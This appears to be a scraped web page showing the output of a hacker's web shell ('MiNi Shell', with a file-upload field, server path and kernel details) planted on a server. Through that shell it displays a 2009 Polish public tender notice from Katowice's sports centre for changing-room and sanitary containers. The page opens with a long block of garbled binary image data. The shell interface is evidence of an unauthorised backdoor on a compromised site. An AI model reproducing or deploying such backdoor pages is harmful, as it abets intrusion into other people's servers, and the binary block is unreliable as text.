JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/63341-N-2009.html

<p class="kh_header"><b>Katowice: Dostawa, montaż i podłączenie dwóch zestawów kontenerów szatniowo-sanitarnych oraz jednego modułu szatniowego z aneksem sanitarnym</b><br>
<b>Numer ogłoszenia: 63341 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , Aleja Korfantego 35, 40-005 Katowice, woj. śląskie, tel. 032 2537741, 2538733, faks 032 2538733.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.um.katowice.pl/jednostki/mosir</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa miasta Katowice nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa, montaż i podłączenie dwóch zestawów kontenerów szatniowo-sanitarnych oraz jednego modułu szatniowego z aneksem sanitarnym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest :
- wykonanie dokumentacji projektowej  z uzyskaniem pozwolenia na budowę dla usytuowania dwóch zestawów szatniowo-sanitarnych oraz jednego modułu szatniowego z aneksem sanitarnym
- dostawa dwóch zestawów szatniowo-sanitarnych  oraz jednego  modułu szatniowego z aneksem sanitarnym (transport, rozładunek dźwigiem, ustawienie na betonitach fundamentowych)
- montaż kontenerów w miejscu uzgodnionym z Zamawiającym
- podłączenie kontenerów do instalacji zewnętrznych (elektrycznej, wodnej i kanalizacyjnej)
- wykonanie schodów dwustopniowych (5 kompletów)
- wykonanie podbudowy pod kontenery    
- wykonanie instalacji kanalizacyjnej, wodnej i elektrycznej.   

  AKTUALNE UWARUNKOWANIA WYKONANIA PRZEDMIOTU ZAMÓWIENIA 
Działka, na której znajduje się obiekt, położona jest przy ul. 11 Listopada w Katowicach- Szopienicach. Działka pełni funkcję rekreacyjno - wypoczynkową i zlokalizowana jest przy drodze publicznej. Budynek hali wielofunkcyjnej znajduje się we wschodniej części działki. Wjazd na teren obiektu znajduje się od granicy południowej. Hala wielofunkcyjna z głównym wejściem od strony południowej posiada również wejście na boiska i korty od strony zachodniej gdzie po prawej 
i lewej stronie znajdują się dwa pasy zieleni o szerokości około 3,5m i długości 20m i 25m. Zestawy kontenerowe należy posadowić w tych właśnie miejscach. Przy wykonywaniu projektu należy zwrócić uwagę na istniejące studzienki kanalizacyjne, znajdujące się w trawniku, które mogą ograniczyć długość jednego zestawu kontenerów. 

Zamawiający zaleca przeprowadzenie wizji lokalnej terenu. Zamawiający umożliwi Wykonawcom, po uprzednim telefonicznym uzgodnieniu terminu pod numerem telefonu 032 759 13 07, przeprowadzenie wizji lokalnej na terenie obiektu.

WYMAGANIA TECHNICZNE - KONTENERY 

Zestaw szatniowo - sanitarny nr 1 powinien składać się z dwóch kontenerów o długości około 5600 mm i szerokości około 2500mm połączonych ze sobą kontenerem sanitarnym o długości minimum 4000mm i szerokości około 2500 mm. Kontener szatniowy powinien być wyposażony w ławki z wieszakami dla minimum 20 osób. Drzwi wejściowe o wymiarach 900/2000 mm. Okna o wymiarach 1165x535mm. Kontener sanitarny powinien składać się z dwóch kabin WC i czterech umywalek (biały montaż, armatura, lustra nad umywalkami).W kontenerach szatniowych należy zabudować drzwi wejściowe o wymiarach 800/2000 mm do części sanitarnej. Kontenery muszą być wyposażone w rozdzielnie elektryczne z wyłącznikiem różnicowo - prądowym, minimum 6 gniazd podwójnych, 3 gniazda pojedyncze (3 grzewcze na osobnym bezpieczniku, oprawy hermetyczne 2x36W 6 sztuk oraz 2 sztuki opraw 1x11W, grzejniki konwektorowe o mocy 2kW w sanitariatach wiszące z nadmuchem oraz wentylatory wywiewne ścienne). 

Zestaw szatniowo - sanitarny nr 2 powinien składać się z dwóch kontenerów o długości około 6100mm i szerokości około 2500mm połączonych ze sobą kontenerem sanitarnym o długości minimum 4000m i szerokości około 2500 mm. Kontener szatniowy powinien być wyposażony w ławki z wieszakami dla minimum 20 osób. Drzwi wejściowe o wymiarach 900/2000 mm. Okna o wymiarach 1165x535mm. Kontener sanitarny powinien składać się z dwóch kabin WC i czterech umywalek (biały montaż, armatura, lustra nad umywalkami). W kontenerach szatniowych należy zabudować drzwi wejściowe o wymiarach 800/2000 mm do części sanitarnej. Kontenery muszą być wyposażone w rozdzielnie elektryczne z wyłącznikiem różnicowo prądowym, minimum 6 gniazd podwójnych, 3 gniazda pojedyncze (3 grzewcze na osobnym bezpieczniku, oprawy hermetyczne 2x36W 6 sztuk oraz 2 sztuki opraw 1x11W, grzejniki konwektorowe o mocy 2kW w sanitariatach wiszące z nadmuchem oraz wentylatory wywiewne ścienne). 

Pojedynczy moduł szatniowy z aneksem sanitarnym powinien składać się z kontenera o długości około 6100mm i szerokości około 2500mm (drzwi wejściowe o wym. 900/2000mm) przedzielony wewnątrz ścianką działową z drzwiami o wymiarach 900/2000mm w celu uzyskania aneksu sanitarnego około 4m2 z 1 kabiną WC (drzwi o wym. 900/2000mm) i dwie umywalki (biały montaż, armatura, lustra nad umywalkami), część szatniową należy wyposażyć w 12 szafek ubraniowych z ławkami, okno o wymiarach 1165x535mm sanitarnej. Kontener musi być wyposażony w rozdzielnie elektryczną z  wyłącznikiem różnicowo - prądowym, minimum 2 gniazda podwójne, 2 gniazda pojedyncze (2 grzewcze na osobnym bezpieczniku, oprawy hermetyczne 2x36W 2 sztuki oraz 3 sztuki opraw 1x11W, grzejniki konwektorowe o mocy 2kW 
w sanitariatach wiszące z nadmuchem oraz wentylatory wywiewne ścienne). 

KONSTRUKCJA- stalowe profile zimnogięte tworzące samonośny szkielet, na który składa się spawana konstrukcja podłogi i stropodachu oraz stalowe słupy usytuowane w narożach kontenera, elementy mają być pokryte farbą podkładową UNIKOR lub równoważną oraz emalią nawierzchniową EMAKOL lub równoważną. Obróbki zewnętrzne profilu obwodowego stropodachu w kolorze RAL 9002.

PODŁOGA-  wypełnienie powinno stanowić od dołu: blacha trapezowa, wełna mineralna grubości 100mm, płyta podłogowa (sklejka OSB lub płyta wiórowo - cementowa CETRIS lub płyta DURELlS) i wykładzina podłogowa antypoślizgowa o podwyższonej odporności na ścieranie. Obciążenie użytkowe maksymalne 350 kg/m2 .

STROPODACH - warstwowy pokryty od zewnątrz blacha ocynkowaną, a od środka kasetami z blachy ocynkowanej pokrytej lakierem akrylowym, ocieplony wełną mineralną o grubości 120mm. Obciążenie użytkowe 150kg/m2, odprowadzenie wody deszczowej w rurach PCV. Zamawiający dopuszcza wykonanie dachu z paneli blaszanych pod warunkiem zachowania wymagań dotyczących ocieplenia i maksymalnego obciążenia użytkowego
ŚCIANY- wykonać z płyt warstwowych typu sandwich ( blacha ocynkowana, styropian 100mm, blacha ocynkowana lakierowana). Ściany zewnętrzne w kolorze RAL9002, ściany wewnętrzne w kolorze RAL 9002 obróbki blacharskie w kolorze RAL 9002. Zamawiający nie dopuszcza zastosowania od wewnątrz kontenera płyty MDF. 

OKNA - zewnętrzne izolowane, wykonane z PCV Uc 1.1 białe uchylne.

DRZWI- zewnętrzne izolowane, wykonane z blachy ocynkowanej lakierowanej 
z samozamykaczem i zamkiem z wkładka patentową wewnętrzne płycinowe izolowane pełne z zamkiem z wkładką patentową.

MEBLE - ławki z wieszakami o wymiarach minimum 2000/430/450/1600 ilość haczyków 6 na każdej ławce, szafki ubraniowe z ławkami 12 sztuk.

SCHODY ZEWNĘTRZNE - schody dwustopniowe wykonać z kraty pomostowej, całość wsparta na konstrukcji wykonanej z profili zimnogiętych (2 komplety na jeden zestaw plus jeden zestaw do modułu pojedynczego).

INSTALACJE WEWNĘTRZNE- kontenery powinny być wyposażone w instalację elektryczną grzewczą i oświetleniową, instalacje wody zimnej i kanalizacji oraz instalację wentylacyjno- klimatyzacyjną. 

PLAC POD ZABUDOWĘ KONTENERÓW 
- plac o wymiarach 3x24m oraz 3x17m, podbudowa o gr. 15cm, kostka o gr.8cm, nawierzchnia żwirowa gr. 10 cm, obrzeże 8x30 
- mechaniczne wykonanie koryta na całej szerokości jezdni i chodnika na głębokość 20cm 129 m2 
- rowki pod krawężniki i ławy krawężnikowe 20x20 - 104m2 
- obrzeża betonowe 30x8cm 104m 
- podbudowa z kruszywa łamanego 129m2 
- nawierzchnie z kostki brukowej 6m2 
- roboty ziemne z przewozem gruntu taczkami 36,41m3 
- nawierzchnie żwirowe o gr. po zagęszczeniu 8cm 

INSTALACJA KANALIZACYJNA 
- wykopy liniowe o szerokości 1,5m i głębokości 1,5m 96,535m3 
- podłoże z materiałów sypkich o gr. 20cm 64,130m2 
- obsypka rurociągu kruszywem 18,357m3 
- ręczne zasypywanie wykopów liniowych 63,317m3 
- roboty ziemne z przewozem gruntu taczkami 33,218m3 
- kanały z rur PCV fi 160 63m 
- studnie rewizyjne z kręgów betonowych - kręgi fi 1200mm 
- przejście przez ściany komór tulejami stalowymi PS otwór fi 310mm 

INSTALACJA ELEKTRYCZNA 
 - nasypanie warstwy piasku na dnie rowu kablowego o szer. 0,4m - 50m 
 - zasypanie rowów dla kabli 12m3 
 - ułożenie kabli w rowach kablowych 50m 
- badanie linii kablowej średniego napięcia 2 odcinki 
- ułożenie rur osłonowych PVC fi 140mm - 50m 
INSTALACJA WODNA 
- podłoże z materiałów sypkich o gr. 20cm - 50,4m2 
- obsypka rurociągu kruszywem 10,080m3 
- roboty ziemne z przewozem gruntu taczkami i20,160m3 
- ręczne zasypywanie wykopów 30,240m3 
- montaż rurociągów z rur ( PE, PEHD) fi 90mm 63m 
- kształtki PVC fi 90mm 
- próba szczelności 
- wcinka do istniejącego rurociągu 

ODTWORZENIE NAWIERZCHNI Z KOSTKI                                                       
 - rozebranie nawierzchni z klinkieru 16,40m2  
 - rozebranie krawężników betonowych 15x30cm 4m 
- rozebranie ław pod krawężniki 0,260m3 
- rowki pod krawężniki i ławy 20x20cm - 4m 
- podbudowa z kruszyw o gr. po zagęszczeniu 15cm 16,40m2 
- nawierzchnia z kostki brukowej o gr. 8cm 16,4m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 44.21.10.00-2, 44.21.11.00-3, 79.42.12.00-3, 45.22.38.00-4, 45.31.00.00-3, 45.33.00.00-9, 45.23.32.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą się ubiegać wykonawcy będący osobami fizycznymi, osobami prawnymi lub jednostkami organizacyjnymi nie posiadającymi osobowości prawnej, a także wykonawcy ci występujący wspólnie (spółka cywilna, konsorcjum), o ile spełniają warunki określone w ustawie oraz w niniejszej specyfikacji. Każdy wykonawca może złożyć tylko jedną ofertę.
2. Wykonawcy, o których mowa w pkt. 1 mogą się ubiegać o udzielenie zamówienia jeśli spełniają warunki określone w art. 22 ust.1 ustawy, a także spełniają wymagania przedstawione poniżej:
- posiadają uprawnienia do wykonywania zamówienia oraz dysponują  osobami posiadającymi niezbędne uprawnienia i kwalifikacje lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia :
Kierownik Budowy  - uprawnienia budowlane w  specjalności konstrukcyjno -budowlanej, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz aktualne zaświadczenia o przynależności do właściwej Okręgowej Izby Samorządu Zawodowego w oparciu o art. 6 ust.1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów inżynierów oraz urbanistów (Dz. U. z 2001r Nr 5 poz.42 ze zm).
- posiadają doświadczenie oraz wykażą, że zrealizowali samodzielnie lub wspólnie w rozumieniu art. 23 ustawy jedno zadanie w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia tj. wykonali minimum jedną dostawę wraz z montażem o parametrach zbliżonych do przedmiotu zamówienia.
3. Ocena spełniania warunków odbędzie się na podstawie złożonych oświadczeń i dokumentów na zasadzie spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Ofertę na formularzu oferty, o treści zgodnej z określoną we wzorze stanowiącym  załącznik nr 1 do SIWZ.
2. Oświadczenia oraz dokumenty potwierdzające spełnianie warunków:
a) aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej. Dokument ten winien być wystawiony nie wcześniej niż na 
6 miesięcy przed dniem składania  ofert,
b) oświadczenie, o treści określonej w art. 22 ust.1 oraz art. 24 ust.1 i 2 ustawy - że wykonawca może ubiegać się o udzielenie zamówienia zgodnie z art. 22 ust.1 ustawy, wg wzoru stanowiącego załącznik do  SIWZ 
c) aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne lub społeczne  lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organ wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
d) aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust.1 pkt.4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
e) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy,  wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Wykaz wykonanych dostaw w ciągu ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia a jeżeli okres działalności jest krótszy - w tym okresie,  odpowiadających swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia tj. wykonali minimum jedną dostawę wraz z montażem o parametrach zbliżonych do przedmiotu zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenie dokumentów potwierdzających, że dostawy te zostały wykonane należycie. 
4. Wykaz osób, które będą wykonywać zamówienie, lub uczestniczyć w wykonywaniu zamówienia wraz z danymi na temat ich kwalifikacji niezbędnych do jego realizacji, a także zakresu wykonywanych przez nich czynności (w tym kierownik budowy z uprawnieniami budowlanymi w specjalności konstrukcyjno-budowlanej). W wykazie należy zaznaczyć, którzy pracownicy posiadają zaświadczenie o przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa.
5. Formularz cenowy.

Oferty wspólne:
W przypadku  gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. spółki cywilne, konsorcja) -ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa podpisanego przez wszystkich wykonawców wspólnie ubiegających się o zamówienie. Pełnomocnictwo winno być w formie oryginału lub notarialnie poświadczonej kopii. Wykonawcy występujący  wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy.

Zamawiający przy ocenie spełniania warunków będzie rozpatrywał podane informacje łącznie z zastrzeżeniem, że:
a) spółki cywilne- dokumenty wymienione w  ppkt. 2 lit. a, b, c, d,  muszą przedstawić dla każdego ze wspólników spółki osobno,
b) konsorcja - dokumenty wymienione w  ppkt. 2 lit. a, b, c, d, e (o ile dotyczy) muszą przedstawić dla każdego z partnerów konsorcjum osobno; ponadto muszą dołączyć list intencyjny podpisany przez wszystkich partnerów konsorcjum, z podziałem ich obowiązków podczas realizacji zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.um.katowice.pl/jednostki/mosir.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Katowicach, al. Korfantego 35, 40-005 Katowice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2009 godzina 09:00, miejsce: Miejski Ośrodek Sportu i Rekreacji w Katowicach, al. Korfantego 35, pokój nr 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com